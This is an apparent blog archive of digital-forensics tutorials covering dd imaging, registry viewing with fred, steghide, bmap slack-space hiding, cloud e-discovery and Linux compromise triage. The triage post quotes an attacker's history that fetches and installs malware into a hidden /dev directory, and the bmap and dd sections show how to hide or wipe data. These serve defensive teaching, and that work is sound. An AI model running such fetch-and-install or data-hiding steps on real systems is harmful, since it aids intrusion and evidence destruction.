Category: Digital Forensics

How To Use DD On Windows Systems

DD is a forensic imaging tool. It has been around for quite a while and is sometimes referred to as GNU dd. It is a command-line program that accepts arguments controlling its imaging behaviour. If it is not used carefully you can accidentally destroy the media you are trying to duplicate, so it must be used with caution. When done correctly it creates raw image files that can then be used by other forensic tools such as EnCase and FTK.

To get a copy of the dd utility for Windows go to: http://www.chrysocome.net/downloads/dd-0.5.zip. It’s a free program distributed under the GPL (General Public License).

Then you can unzip the download onto your desktop or whichever directory you prefer.

For my demonstration, I created a couple of test partitions and then used the dd utility to do a volume copy of one partition to another. So I created a “G:” and an “H:”.

Each partition had exactly the same size for my first attempt, but for my second attempt I gave the H partition an extra 1GB. Any time you wish to create an image using dd you need to make sure your output storage area has enough capacity for the copy.

From there you open a command prompt as administrator. This requirement is most likely dictated by the security configuration of your PC, so it may not be necessary depending on your security settings.

Navigate to the directory containing the unzipped dd executable.

After that you can use dd --list to get a list of the devices on your computer.

The basic structure of dd is:

dd if= of= bs=

Where “if” is your input file, “of” is your output file, and “bs” is your block size.

You can use null inputs such as /dev/zero to write zeros to a partition. This effectively wipes that partition or drive.

One note on block size: 512 bytes is as low as it goes. The lower the block size, the slower the copy, so if you plan on copying a large drive a low block size might dramatically increase the time it takes. A lower block size will be more accurate. You can choose sizes such as 512, 1024, 2048 or 4096.
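As an added example (my own Python, not code from the original post or from the dd distribution), here is the if/of/bs copy loop written out with the capacity check the post asks for and a SHA-256 verification pass over the finished image; the file names and the 10,000-byte sample “partition” are constructed for the demo.

```python
"""Added example (not from the original post): a dd-style raw imager.

Copies `src` to `dst` in `bs`-sized blocks, hashes the bytes as they stream
past, then re-reads the image to verify it. The free-space check is the
post's "make sure your output storage area has enough capacity" done in code.
"""
import hashlib
import os
import shutil
import tempfile

SECTOR = 512  # the smallest block size the post recommends


def bs_is_valid(bs: int) -> bool:
    """dd accepts almost anything; for imaging, stick to whole sectors."""
    return bs >= SECTOR and bs % SECTOR == 0


def raw_image(src: str, dst: str, bs: int = 4096) -> dict:
    """Equivalent of dd if=src of=dst bs=bs, with hashing and verification."""
    if not bs_is_valid(bs):
        raise ValueError("bs must be a multiple of 512 bytes")
    with open(src, "rb") as fin:
        fin.seek(0, os.SEEK_END)      # works for regular files and Linux block devices
        src_size = fin.tell()
        fin.seek(0)
        free = shutil.disk_usage(os.path.dirname(os.path.abspath(dst))).free
        if free < src_size:
            raise OSError(f"destination has {free} bytes free, source needs {src_size}")

        h_in = hashlib.sha256()
        copied = 0
        with open(dst, "wb") as fout:
            while True:
                block = fin.read(bs)  # the last read may be short: dd's "partial record"
                if not block:
                    break
                h_in.update(block)
                fout.write(block)
                copied += len(block)

    # Verification pass: hash the written image independently of the copy loop.
    h_out = hashlib.sha256()
    with open(dst, "rb") as fimg:
        for block in iter(lambda: fimg.read(bs), b""):
            h_out.update(block)

    return {
        "bytes": copied,
        "full_blocks": copied // bs,
        "partial_block": copied % bs != 0,
        "sha256": h_in.hexdigest(),
        "verified": copied == src_size and h_in.hexdigest() == h_out.hexdigest(),
    }


def demo() -> dict:
    """Image a constructed 10,000-byte 'partition' (2 full 4 KiB blocks + a partial one)."""
    data = bytes(range(256)) * 39 + b"\x00" * 16   # 9984 + 16 = 10000 bytes, constructed
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "G.img")   # stands in for the G: partition
        dst = os.path.join(tmp, "H.img")   # stands in for the image file on H:
        with open(src, "wb") as f:
            f.write(data)
        result = raw_image(src, dst, bs=4096)
    result["expected_sha256"] = hashlib.sha256(data).hexdigest()
    return result


if __name__ == "__main__":
    print(demo())
```

Record the returned digest alongside the image; re-hashing the image later and comparing is how you prove it has not changed since acquisition.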

For my example I simply copied one partition to another.

This should have effectively copied one partition to the other.

I repeated the process, extending the size of the H: partition to 3GB, and this time created an image file with the dd command instead.

This worked as expected.

dd is an easy-to-use tool and provides effective bit-by-bit imaging of a drive or partition.

How To View Windows Registry On Linux

Introduction

Forensic Registry EDitor (fred) is a cross-platform Microsoft registry hive editor. It is a GUI-based registry editor that works on Linux and has a built-in hex viewer and data interpreter.

Installation

The best way to install this tool is to follow the instructions of its author, Daniel:

In order to automatically stay up-to-date when new versions are released, I recommend adding my repository to your software sources list. This is done by executing the following commands:

sudo wget -P /etc/apt/sources.list.d/ http://deb.pinguin.lu/pinguin.lu.list
wget -q http://deb.pinguin.lu/debsign_public.key -O- | sudo apt-key add -
sudo apt-get update

Once done, you can install packages by issuing:

sudo apt-get install fred fred-reports


Environment

I used a hard disk image of a Windows system.

# ewfmount myImage.E01 /mnt/ewf/
# mount -o ro,loop,show_sys_files,streams_interface=windows /mnt/ewf/ewf1 /mnt/windows_mount

I mounted my image at /mnt/windows_mount. Since I was using an E01 image, I used a two-step process to mount it. For details on how to mount an E01 image in Linux you can check this post. You don’t need to use an E01 image; any image you can mount in Linux, e.g. a raw image, would be fine.


Usage

I will give some examples that show how to use this powerful tool. First let’s cover the locations of the hives. If you are already familiar with the Windows Registry you can skip this section and continue with Finding unique device serial number of a USB Key.

In Windows NT 4 (and later) the Registry is stored in the Windows NT Registry File (REGF) format (http://www.forensicswiki.org/wiki/Windows_Registry).

Basically the following Registry hives are stored in the corresponding files:

  • HKEY_USERS: \Documents and Settings\User Profile\NTUSER.DAT
  • HKEY_USERS\DEFAULT: C:\Windows\system32\config\default
  • HKEY_LOCAL_MACHINE\SAM: C:\Windows\system32\config\SAM
  • HKEY_LOCAL_MACHINE\SECURITY: C:\Windows\system32\config\SECURITY
  • HKEY_LOCAL_MACHINE\SOFTWARE: C:\Windows\system32\config\software
  • HKEY_LOCAL_MACHINE\SYSTEM: C:\Windows\system32\config\system
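Before loading one of these files into a viewer it is worth checking that it is a complete, consistent hive. The following is an added example (my own Python, not part of the original post or of fred) that decodes the REGF base block of a hive such as the system file above and reports a dirty or truncated copy; the hive it parses is constructed in code, not taken from a real system.

```python
"""Added example (not part of the original post or of fred): sanity-check a
registry hive's REGF base block before opening it in a GUI tool.

The base block is the first 4096 bytes of files such as
C:\\Windows\\system32\\config\\system. A hive copied from a live or unclean
image is frequently "dirty" (primary and secondary sequence numbers differ)
or truncated, which explains odd results in any hive viewer. The layout
decoded here is the documented REGF format; the sample hive is constructed.
"""
import struct
from datetime import datetime, timedelta, timezone

BASE_BLOCK = 4096
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def _filetime(ft: int) -> datetime:
    """Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def regf_checksum(block: bytes) -> int:
    """XOR of the 127 DWORDs preceding the checksum field at 0x1FC."""
    x = 0
    for (dword,) in struct.iter_unpack("<I", block[:0x1FC]):
        x ^= dword
    if x == 0xFFFFFFFF:          # documented special cases
        return 0xFFFFFFFE
    return x if x else 1


def parse_regf(data: bytes) -> dict:
    """Decode the base block and report consistency problems."""
    if len(data) < BASE_BLOCK or data[:4] != b"regf":
        raise ValueError("not a REGF hive (bad signature or too short)")
    (seq1, seq2, ts, major, minor, ftype, fformat,
     root_off, bins_size) = struct.unpack_from("<IIQIIIIII", data, 4)
    name = data[0x30:0x70].decode("utf-16-le").split("\x00", 1)[0]
    stored_sum = struct.unpack_from("<I", data, 0x1FC)[0]
    issues = []
    if seq1 != seq2:
        issues.append("dirty hive: sequence numbers differ (transaction logs not applied)")
    if stored_sum != regf_checksum(data):
        issues.append("base block checksum mismatch")
    if data[BASE_BLOCK:BASE_BLOCK + 4] != b"hbin":
        issues.append("first hive bin missing at offset 4096")
    if len(data) < BASE_BLOCK + bins_size:
        issues.append("file shorter than declared hive bins size (truncated copy?)")
    return {
        "name": name, "version": f"{major}.{minor}", "primary_file": ftype == 0,
        "root_cell_offset": root_off, "bins_size": bins_size,
        "last_written": _filetime(ts).isoformat(),
        "sequence": (seq1, seq2), "issues": issues,
    }


def build_sample_hive(seq2: int = 7) -> bytes:
    """Constructed sample: a valid-looking version 1.5 hive with one empty bin."""
    hdr = bytearray(BASE_BLOCK)
    delta = datetime(2013, 6, 1, tzinfo=timezone.utc) - EPOCH_1601
    ts = (delta.days * 86400 + delta.seconds) * 10_000_000   # exact integer FILETIME
    struct.pack_into("<4sIIQIIIIII", hdr, 0, b"regf", 7, seq2, ts, 1, 5, 0, 1, 0x20, BASE_BLOCK)
    hdr[0x30:0x70] = "SYSTEM".encode("utf-16-le").ljust(64, b"\x00")
    struct.pack_into("<I", hdr, 0x1FC, regf_checksum(bytes(hdr)))
    hbin = struct.pack("<4sIIQQI", b"hbin", 0, BASE_BLOCK, 0, 0, 0).ljust(BASE_BLOCK, b"\x00")
    return bytes(hdr) + hbin


if __name__ == "__main__":
    print(parse_regf(build_sample_hive()))
    print(parse_regf(build_sample_hive(seq2=8))["issues"])
```

To check a real hive, pass the bytes of the file (for example /mnt/windows_mount/WINDOWS/system32/config/system opened read-only) to parse_regf.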

1. Finding unique device serial number of a USB Key

This information is stored at SYSTEM\ControlSet001\Enum\USBSTOR

We know that the SYSTEM registry hive is stored in C:\Windows\system32\config\system

Let’s go to the directory that contains the system file (/WINDOWS/system32/config/system). I mounted the image at /mnt/windows_mount, so I will type

cd /mnt/windows_mount/WINDOWS/system32/config

Then I can type the following to run fred on the system file:

root@siftworkstation:/mnt/windows_mount/WINDOWS/system32/config# fred system

So it is the value I circled in red.


[Screenshot: fred1]

2. What was the last time that a user opened a .doc file?

This data is stored in NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

NTUSER.DAT is in \Documents and Settings\User Profile. First we need to go into that directory and run

fred NTUSER.DAT

[Screenshot: fred2]

So it is the value I circled in red.

3. What was the last program a user ran using the Start->Run dialog?

We need to use fred and open NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

[Screenshot: fred3]

In the right column we see what the user ran using Start->Run.

Conclusion

The Windows registry holds a lot of useful information for investigators. Fred helps investigators find the data they need in the registry very easily. The best thing about Fred is that it is open source and costs you zero dollars…

I would love to hear what you think about fred and registry tools in general.


Forensics Netwars First Day

I had been planning to attend the DFIR Summit for the last two years, and now I am in Austin for it. As part of the DFIR Summit I am attending Forensics NetWars. Forensics NetWars is a fun exercise that helps you remember the forensics knowledge you may have forgotten and learn some new tricks. The best thing is that if you screw up, that’s okay. You cannot damage anything but your NetWars score…

I was reminded of the power of the stat command when it comes to MAC times. I also found a new tool called Fred for analyzing the registry. I was also reminded that the -iname option ignores case when you use it with the “find” command.

I am planning to write how to install and use Fred this week.


Hiding Data: Steganography on Linux

My last blog post was about hiding information in slack space using a special tool called Bmap. Today I am going to discuss steganography more generally. Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message. It is different from encryption: encryption does not care whether the outside world knows the ciphertext exists, whereas steganography deals with hiding the very existence of the information, even if that information is encrypted.

See the following example:

Alex wants to send a message to Bob. She wants only Bob to read the message. She can use encryption (symmetric or asymmetric). The risk here is a possible attack to decipher her message. She can also try hiding the message in a different format (say in a JPEG file) and send it over to Bob. Since the message will be inside a picture, the attacker Tom will probably not recover the message from the file.

Of course, if he desperately wants to read the message, he can use some forensics tools to recover it. For this reason, combining encryption with steganography is the best choice for Alex.

Today I am going to discuss a Linux tool, steghide, that does both encryption and steganography. On Debian-based systems you can install steghide with the following command:

apt-get install steghide

By default steghide compresses the embedded data and encrypts it with the Rijndael-128 algorithm.

I have two files under my Private folder:

root@bt:~/Private# ls -l
total 24
-rw-r--r-- 1 root root    20 Jan 30 18:24 myMessageToBob.txt
-rw-r--r-- 1 root root 17875 Jan 30 18:23 soccer.jpg

My goal is to embed the text file into the JPEG file.

Let’s check whether we have enough space in the JPEG file to do that:

steghide info soccer.jpg
"soccer.jpg":
format: jpeg
capacity: 1.0 KB
Try to get information about embedded data ? (y/n)

So we can embed 1.0 KB of data and we only have 20 B of data (see the ls -l output).

root@bt:~/Private# steghide embed -cf soccer.jpg -ef myMessageToBob.txt
Enter passphrase:
Re-Enter passphrase:
embedding "myMessageToBob.txt" in "soccer.jpg"... done

-cf stands for cover file whereas -ef stands for embedded file.

Let’s now check the size of the JPEG file.

ls -l
total 24
-rw-r--r-- 1 root root    20 Jan 30 18:24 myMessageToBob.txt
-rw-r--r-- 1 root root 18396 Jan 30 18:27 soccer.jpg

Hmm, it got bigger. That was expected, but the original data was just 20 B and we know that steghide compresses data before embedding.

As you might guess, the extra 521 B (18396 - 17875) comes from the encryption and the CRC checksum of the embedded data, which are also added to the JPEG file.

Try opening the JPEG file. You will not see any difference from the original.

Now we want to extract the data from the JPEG file.

root@bt:~/Private# steghide extract -sf soccer.jpg
Enter passphrase:
the file "myMessageToBob.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "myMessageToBob.txt".


root@bt:~/Private# ls -l
total 24
-rw-r--r-- 1 root root    20 Jan 30 18:58 myMessageToBob.txt
-rw-r--r-- 1 root root 18396 Jan 30 18:27 soccer.jpg

After we extracted the text file from the JPEG, the data inside the JPEG is still there (compare the sizes after embedding and after extracting: they are the same).

The only disadvantage I can think of is not being able to wipe the data from the cover file (the file you embed the data into).

Hiding Data: Slack Space on Linux

I am going to cover slack space in various operating systems. The first post is about slack space in Linux.

What is Slack Space?

Before explaining slack space, one should know what blocks (on Linux) and clusters (on Windows) mean. Blocks are fixed-size containers used by the file system to store data; they can also be defined as the smallest pieces of data that a file system can use to store information. Files consist of one or more blocks/clusters, as many as the size of the file requires. When data is stored in these blocks one of two mutually exclusive conditions occurs: the block is completely full, or the block is partially full. If the block is completely full, the most optimal situation for the file system has occurred. If the block is only partially full, the area between the end of the file and the end of the container is referred to as slack space. Linux writes nulls to slack space, which means that finding data in slack space on Linux systems is rare. However, it is not impossible.

Today, I am going to show how to hide data in slack space using a tool called bmap.

Bmap

Bmap, a data hiding tool, can utilize the slack space in blocks to hide data.

It can perform lots of functions of interest to the computer forensics and computer security communities. However, in this article we will focus on its data hiding capability.

Installing Bmap

Click this link and save the tar.gz file on your Linux desktop.
tar xvzf bmap-1.0.17.tar.gz

After untarring the file, we can go into the directory and compile the program.
cd bmap-1.0.17
make

Optional: I placed bmap into /sbin so I don’t need to go into the bmap directory each time I want to run the program.
ln -s yourBmapFilePath /sbin/bmap

Hiding Data on Slack Space

In the following example we will hide some text in slack space. Let’s see what options we have with bmap:
bmap --help
bmap:1.0.17 (12/25/10) newt@scyld.com
Usage: bmap [OPTION]... []
use block-list knowledge to perform special operations on files
--doc VALUE
where VALUE is one of:
version display version and exit
help display options and exit
man generate man page and exit
sgml generate SGML invocation info
--mode VALUE
where VALUE is one of:
map list sector numbers
carve extract a copy from the raw device
slack display data in slack space
putslack place data into slack
wipeslack wipe slack
checkslack test for slack (returns 0 if file has slack)
slackbytes print number of slack bytes available
wipe wipe the file from the raw device
frag display fragmentation information for the file
checkfrag test for fragmentation (returns 0 if file is fragmented)
--outfile write output to ...
--label useless bogus option
--name useless bogus option
--verbose be verbose
--log-thresh logging threshold ...
--target operate on ...

The option I am going to use is --mode with the slack, putslack, wipe and map VALUEs. I have created a text file named ismail.txt. Let’s see what sectors this file uses.
bmap --mode map ismail.txt
3113400
3113401
3113402
3113403
3113404
3113405
3113406
3113407

As you can see from the output of bmap, ismail.txt uses 8 sectors starting from 3113400. This corresponds to one block in Linux. This text file is too small to use all of the sectors in the block.

bmap --mode slack ismail.txt
getting from block 389175
file size was: 8
slack size: 4088
block size: 4096

The file only uses 8 bytes (1 sector is 512 bytes, so the data sits in the first sector). The other 7 sectors and the remaining 504 bytes of the first sector are empty (Linux writes nulls to slack space, so they contain only zeros).

We can use this slack space to hide data.

echo "I'm hiding this and you cannot easily see it" | bmap --mode putslack ismail.txt
stuffing block 389175
file size was: 8
slack size: 4088
block size: 4096

Now check what we have in slack space:

bmap --mode slack ismail.txt
getting from block 389175
file size was: 8
slack size: 4088
block size: 4096
I'm hiding this and you cannot easily see it

(This command also gives the block number of the file, 389175)

We can now wipe the data we put on slack space.
bmap --mode wipe ismail.txt

bmap --mode slack ismail.txt
getting from block 389175
file size was: 8
slack size: 4088
block size: 4096

Summary

Slack space can be used for hiding data. Even though advanced forensics tools reveal hidden information in slack space, most system owners will not check all of their slack space since it is such a time-consuming activity. Bmap is one of the tools that help attackers hide information in slack space on Linux systems. As security engineers, we need to be careful when we analyze a compromised Linux system and check the slack space as well.

How to Suck at Information Security

Security Policy and Compliance

  • Ignore regulatory compliance requirements.
  • Assume the users will read the security policy because you’ve asked them to.
  • Use security templates without customizing them.
  • Jump into a full-blown adoption of frameworks such as ISO 27001/27002 before you’re ready.
  • Create security policies you cannot enforce.
  • Enforce policies that are not properly approved.
  • Blindly follow compliance requirements without creating overall security architecture.
  • Create a security policy just to mark a checkbox.
  • Pay someone to write your security policy without any knowledge of your business or processes.
  • Translate policies in a multi-language environment without consistent meaning across the languages.
  • Make sure none of the employees finds the policies.
  • Assume that if the policies worked for you last year, they’ll be valid for the next year.
  • Assume that being compliant means you’re secure.
  • Assume that policies don’t apply to executives.
  • Hide from the auditors.

Security Tools

  • Deploy a security product out of the box without tuning it.
  • Tune the IDS to be too noisy, or too quiet.
  • Buy security products without considering the maintenance and implementation costs.
  • Rely on anti-virus and firewall products without having additional controls.
  • Run regular vulnerability scans, but don’t follow through on the results.
  • Let your anti-virus, IDS, and other security tools run on “auto-pilot.”
  • Employ multiple security technologies without understanding how each of them contributes.
  • Focus on widgets, while omitting to consider the importance of maintaining accountability.
  • Buy expensive product when a simple and cheap fix may address 80% of the problem.

Risk Management

  • Attempt to apply the same security rigor to all IT assets, regardless of their risk profiles.
  • Make someone responsible for managing risk, but don’t give the person any power to make decisions.
  • Ignore the big picture while focusing on quantitative risk analysis.
  • Assume you don’t have to worry about security, because your company is too small or insignificant.
  • Assume you’re secure because you haven’t been compromised recently.
  • Be paranoid without considering the value of the asset or its exposure factor.
  • Classify all data assets as “top secret.”

Security Practices

  • Don’t review system, application, and security logs.
  • Expect end-users to forgo convenience in place of security.
  • Lock down the infrastructure so tightly, that getting work done becomes very difficult.
  • Say “no” whenever asked to approve a request.
  • Impose security requirements without providing the necessary tools and training.
  • Focus on preventative mechanisms while ignoring detective controls.
  • Have no DMZ for Internet-accessible servers.
  • Assume your patch management process is working, without checking on it.
  • Delete logs because they get too big to read.
  • Expect SSL to address all security problems with your web application.
  • Ban the use of external USB drives while not restricting outbound access to the Internet.
  • Act superior to your counterparts on the network, system admin, and development teams.
  • Stop learning about technologies and attacks.
  • Adopt hot new IT or security technologies before they have had a chance to mature.
  • Hire somebody just because he or she has a lot of certifications.
  • Don’t apprise your manager of the security problems your efforts have avoided.
  • Don’t cross-train the IT and security staff.

Password Management

  • Require your users to change passwords too frequently.
  • Expect your users to remember passwords without writing them down.
  • Impose overly-onerous password selection requirements.
  • Use the same password on systems that differ in risk exposure or data criticality.
  • Impose password requirements without considering the ease with which a password could be reset.

Thanks to Lenny Zeltser for his awesome cheat sheet. For the original document please see http://zeltser.com/security-management/suck-at-security-cheat-sheet.html. If you have any suggestions other than the ones above, let me know! ismail@realinfosec.com

Legal and Electronic Discovery in the Cloud

Cloud Computing creates new dynamics in the relationship between an organization and its information, involving the presence of a third party: the cloud provider. This creates new challenges in understanding how laws apply to a wide variety of information management scenarios.

A complete analysis of Cloud Computing-related legal issues requires consideration of functional, jurisdictional, and contractual dimensions.

  • The functional dimension involves determining which functions and services in Cloud Computing have legal implications for participants and stakeholders.
  • The jurisdictional dimension involves the way in which governments administer laws and regulations impacting Cloud Computing services, the stakeholders, and the data assets involved.
  • The contractual dimension involves the contract structures, terms and conditions, and enforcement mechanisms through which stakeholders in Cloud Computing environments can address and manage the legal and security issues.

Cloud Computing in general can be distinguished from traditional outsourcing in three ways: the time of service (on-demand and intermittent), the anonymity of identity of the service provider(s) and anonymity of the location of the server(s) involved. When considering IaaS and PaaS specifically, a great deal of orchestration, configuration, and software development is performed by the customer — so much of the responsibility cannot be transferred to the cloud provider.

Compliance with recent legislative and administrative requirements around the world forces stronger collaboration among lawyers and technology professionals. This is especially true in Cloud Computing, due to the potential for new areas of legal risk created by the distributed nature of the cloud, compared to traditional internal or outsourced infrastructure.

Numerous compliance laws and regulations in the United States and the European Union either impute liability to subcontractors or require business entities to impose liability upon them via contract.

Courts now are realizing that information security management services are critical to making decisions as to whether digital information may be accepted as evidence. While this is an issue for traditional IT infrastructure, it is especially concerning in Cloud Computing due to the lack of established legal history with the cloud.

Recommendations

√ Customers and cloud providers must have a mutual understanding of each other’s roles and responsibilities related to electronic discovery, including such activities as litigation hold, discovery searches, who provides expert testimony, etc.

√ Cloud providers are advised to assure their information security systems are responsive to customer requirements to preserve data as authentic and reliable, including both primary and secondary information such as metadata and log files.

√ Data in the custody of cloud service providers must receive equivalent guardianship as in the hands of their original owner or custodian.

√ Plan for both expected and unexpected termination of the relationship in the contract negotiations, and for an orderly return or secure disposal of assets.

√ Pre-contract due diligence, contract term negotiation, post-contract monitoring, and contract termination, and the transition of data custodianship are components of the duty of care required of a cloud services client.

√ Knowing where the cloud service provider will host the data is a prerequisite to implementing the required measures to ensure compliance with local laws that restrict the cross-border flow of data.

√ As the custodian of the personal data of its employees or clients, and of the company’s other intellectual property assets, a company that uses Cloud Computing services should ensure that it retains ownership of its data in its original and authenticable format.

√ Numerous security issues, such as suspected data breaches, must be addressed in specific provisions of the service agreement that clarify the respective commitments of the cloud service provider and the client.

√ The cloud service provider and the client should have a unified process for responding to subpoenas, service of process, and other legal requests.

√ The cloud services agreement must allow the cloud services client or designated third party to monitor the service provider’s performance and test for vulnerabilities in the system.

√ The parties to a cloud services agreement should ensure that the agreement anticipates problems relating to recovery of the client’s data after their contractual relationship terminates.

References: Cloud Security Alliance Guide

Introduction to Linux Forensics- Part I

It has been two weeks since my last blog post. There are some reasons behind this: I am busy with work.

However, I have not neglected my blog; I was actually writing two new blog posts, one on e-mail security with GPG and another for my third Nessus post. Those are still in progress. I have saved them and will complete them as soon as I have more free time.

I am currently visiting Rackspace Cloud in San Antonio. I started writing this blog post on the plane and now I will complete it in my hotel room…

———————————————————————————————————

I am currently writing an article for Slicehost customers to show them how to investigate their slices (Linux VPS) during a possible compromise.

I am doing some research and applying my knowledge to the Slicehost environment, which makes the article take quite some time to complete.

I thought it would be good to have a blog post about a more general environment. This is my first forensics-related post. Yes, I have a huge interest in computer forensics.

Introduction

First of all, this article covers only the basics of Linux forensics. That is to say, I won’t cover any highly sophisticated forensic techniques here (at least in the first two articles).

The aim of this blog post is simply to show you how you can investigate your compromised Linux machine and learn from your mistakes. (I will have articles about some advanced forensics tools such as Autopsy, Vinetto and MboxGrep later.)

IMPORTANT WARNING: Before you do anything, you need to make an important decision—do you plan to involve law enforcement and prosecute the attacker? If the answer is yes, you should leave the compromised system alone and make no changes to it.

Any changes you make post-attack could complicate and taint the evidence, and because of that, many people have a policy of unplugging a system once they detect an attack and leaving it off until law enforcement arrives.

Investigators likely will want the complete system, or at least the drives, so they can store it safely; thus, your forensics analysis might end here until your system is returned. [1]

Nobody is perfect. Everybody makes mistakes. However, I try as hard as I can not to make the same mistake twice. I believe only stupid people do that. At least, I feel stupid if I make the same mistake again.

Ok, back to our lesson. We have a compromised Linux machine. First, stay calm. It is ok to get hacked; we are not the only ones whose boxes got cracked. Of course, good system administrators will do everything to avoid this type of situation.

However, even if you believe you are a very knowledgeable system administrator, your machines can be hacked by an attacker exploiting a newly discovered vulnerability…

Checking Network Connection

Check the network connections and open ports with the netstat command.

Usage

netstat -an

By running this command you can see any backdoors that are listening.

tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN

In this case we see that port 6697 is open. That is not a good sign, because that port is used by IRC. We can sniff the connection with tcpdump. For more info on tcpdump, check this blog post.

tcpdump src port 6697

You can check here for more info on IRC bots.

Checking Last Logged in IPs

Brute-force attacks are a very popular type of attack. You may be able to find out who attacked you by checking the last logged-in IPs with the last command.

Using last you can determine the time a user logged in and out. It also provides the hostname / IP address the user logged in from.

last -25

This will give us the IP addresses of the last 25 logins to the system.

The /var/log/auth.log file can also have valuable information regarding successful or failed login attempts.

Checking Last Commands

You may have heard “No crime is perfect” a lot if you have ever watched the Forensic Files TV show. It is true. Only a few good hackers manage not to leave their fingerprints on their digital crime.

For example, most of the time intruders leave their .bash_history files behind. The .bash_history file contains the last commands used with the bash shell.

This can give us a lot of information about what they did, what they installed and where they got their files from. Typical entries may include:

wget http://malware.tar.gz
gunzip malware.tar.gz
tar xf malware.tar
cd hpd
install
cd ..
rm malware.tar
cd /dev/.hpd

This tells us the URL they got the malware from, how they ran it, and where it was installed. A good starting point for looking for their directory! [2]

Be aware of how .bash_history stores information! It only shows all the commands run by a specific user after that user has logged out.

If the attacker is still logged in and you are trying to check his .bash_history, you may see an empty file.

Use the who command to see the active users on the machine.

who
user1 pts/0 Nov 18 23:33 (1.2.3.4)
user2 pts/1 Nov 16 10:22 (5.6.7.8)

We see two active users on the system. If user2 is the compromised account, we should capture and monitor his traffic with tcpdump:

tcpdump host 5.6.7.8 -w demo.dump

You can also use the history command to list the last executed commands.

To get more useful information from the history command and the .bash_history file, let’s modify the /etc/profile file.

Add the following line at the end of the file:

export HISTTIMEFORMAT="%h/%d - %H:%M:%S "

You can now see the time at which commands were run. (You will be able to see all commands with time stamps in the output of history.)

However, for .bash_history you will only be able to see time stamps for new commands, which is not useful for us.
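The netstat -an and .bash_history checks above are easy to script for a first pass. The following is an added example (my own Python, not from the original post) that parses a constructed netstat listing and a constructed history file modelled on the listings above, flags listening ports outside an expected set, and pulls out download URLs and hidden directories under /dev or /tmp; the expected-port set, the sample data and the placeholder host name are assumptions for the demo.

```python
"""Added example (not part of the original post): first-pass triage of the
two artefacts the post inspects by eye, `netstat -an` output and a
.bash_history file. Both inputs are constructed samples modelled on the
post's own listings, not captures from a real incident.
"""
import re
from urllib.parse import urlparse

# Ports the post treats as normal on this box (assumption); anything else listening is flagged.
EXPECTED_LISTENERS = {22, 25, 80}

NETSTAT_SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:6697           5.6.7.8:51122           ESTABLISHED
"""

# Constructed history; the host is a placeholder, not a real download site.
HISTORY_SAMPLE = """\
ls -la
wget http://example.invalid/malware.tar.gz
gunzip malware.tar.gz
tar xf malware.tar
cd hpd
./install
cd ..
rm malware.tar
cd /dev/.hpd
"""

PROTOS = ("tcp", "tcp6", "udp", "udp6")
FETCH_RE = re.compile(r"^\s*(?:wget|curl|fetch|ftp)\b")
# Dot-directories in locations that normally hold none (the post's /dev/.hpd).
HIDDEN_DIR_RE = re.compile(r"(?:^|\s)(/(?:dev|tmp|var/tmp)/\.[^\s/]+)")


def unexpected_listeners(netstat_text: str, expected=EXPECTED_LISTENERS) -> list:
    """(proto, local address, port) for LISTEN sockets whose port is not expected."""
    found = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] not in PROTOS or parts[-1] != "LISTEN":
            continue
        local = parts[3]
        port = int(local.rsplit(":", 1)[1])
        if port not in expected:
            found.append((parts[0], local, port))
    return found


def remote_peers(netstat_text: str) -> set:
    """Foreign hosts of ESTABLISHED connections: candidates for `tcpdump host ...`."""
    peers = set()
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) >= 6 and parts[0] in PROTOS and parts[-1] == "ESTABLISHED":
            peers.add(parts[4].rsplit(":", 1)[0])
    return peers


def history_indicators(history_text: str) -> dict:
    """Download URLs and suspicious hidden directories, with their line number in the history."""
    urls, hidden = [], []
    for n, line in enumerate(history_text.splitlines(), 1):
        if FETCH_RE.match(line):
            for tok in line.split()[1:]:
                parsed = urlparse(tok)
                if parsed.scheme in ("http", "https", "ftp"):
                    urls.append((n, parsed.hostname, tok))
        m = HIDDEN_DIR_RE.search(line)
        if m:
            hidden.append((n, m.group(1)))
    return {"download_urls": urls, "hidden_dirs": hidden}


if __name__ == "__main__":
    print(unexpected_listeners(NETSTAT_SAMPLE))
    print(remote_peers(NETSTAT_SAMPLE))
    print(history_indicators(HISTORY_SAMPLE))
```

Feed it the real output (netstat -an, and each user’s .bash_history read after the user has logged out, as the post notes) and treat every hit as a lead to verify, not a verdict.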

Summary

We learned some basic techniques for investigating compromised Linux machines, such as checking network connections, active users on the system, the bash history, last logged-in users’ IPs etc. All of this information is critical for tracking intruders and finding security holes on the system.

The next post will discuss integrity checks and some helpful tools such as rootkit scanners.